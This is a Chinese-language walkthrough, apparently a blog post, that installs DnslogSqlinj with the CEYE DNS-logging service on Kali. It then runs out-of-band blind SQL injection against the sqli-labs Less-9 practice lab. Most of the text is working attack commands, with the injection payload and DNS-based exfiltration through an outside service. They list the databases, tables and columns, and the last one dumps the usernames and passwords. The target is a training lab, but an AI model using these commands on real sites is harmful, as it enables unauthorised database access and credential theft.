#涉及工具于环境搭建
工具下载
https://github.com/ADOOO/DnslogSqlinj
CEYE - Monitor service for security testing (dns域名接口)
使用kail
python.2.7环境
pip2 install gevent==1.2.2
pip2 install termcolor
注:pip安装termcolor失败解决方法_termcolor 安装_B1aK2的博客-CSDN博客
如果termcolor安装失败可以查看以上文章解决方案
直接在kail的 终端输入:
pip2 install gevent==1.2.2
pip2 install termcolor
即可安装
#CCYE+DnslogSqlinj使用
首先先在CCYE注册一个账号
点击右上角打开主界面
有ldentifier和API Token 这是我们一会需要用到的
打开kail 进入DnslogSqlinj-master的目录
编辑 config.py这个文件
将之前 CCYE的信息输入进去
Lentifier对应的是Dnsurl
apitoken对应的是apitoken
#自动化语句结构
#演示案例
1.首先打开程序
命令:sudo python dnslogSql.py
2. 获取所有数据库
play load:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs
注入语句:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" --dbs
?id=1' and ({}) --+ --dbs
?id=1' --+ 首先是先确定了他的闭合方式使用' 闭合,因为这个工具不会帮你自动检测有哪些注入点,所以你需要先找到的注入点,确定了他的闭合方式。
and ({}): ({})这个地方是注入指令放进去的位置,注入的语句
--dbs :解析所有库名
当我们敲了回车之后他就会把({})的注入语句,发送到http://192.168.222.142这个目标网站位置上去
Get data count: 当前有9个数据库
以上就是目标网站的所有数据库
3.获取指定数据库所有的表名(指定查看security数据库)
paly load:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables
注入语句
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" --tables
回车之后他就会把指定数据表的所有表名搞出来
显示一共4张表
4.获取列名(查看指定数据表”users”的所有字段信息(列))
play load
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns
语句:
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" --columns
此时users数据表所有的字段信息就都出来了
5.拖库 (查看username和password的所有信息)
paly load
python2 dnslogSql.py -u "http://192.168.222.142/sqli-labs-master/Less-9/?id=1'and ({}) --+" -D "security" -T "users" -C "username,password" --dump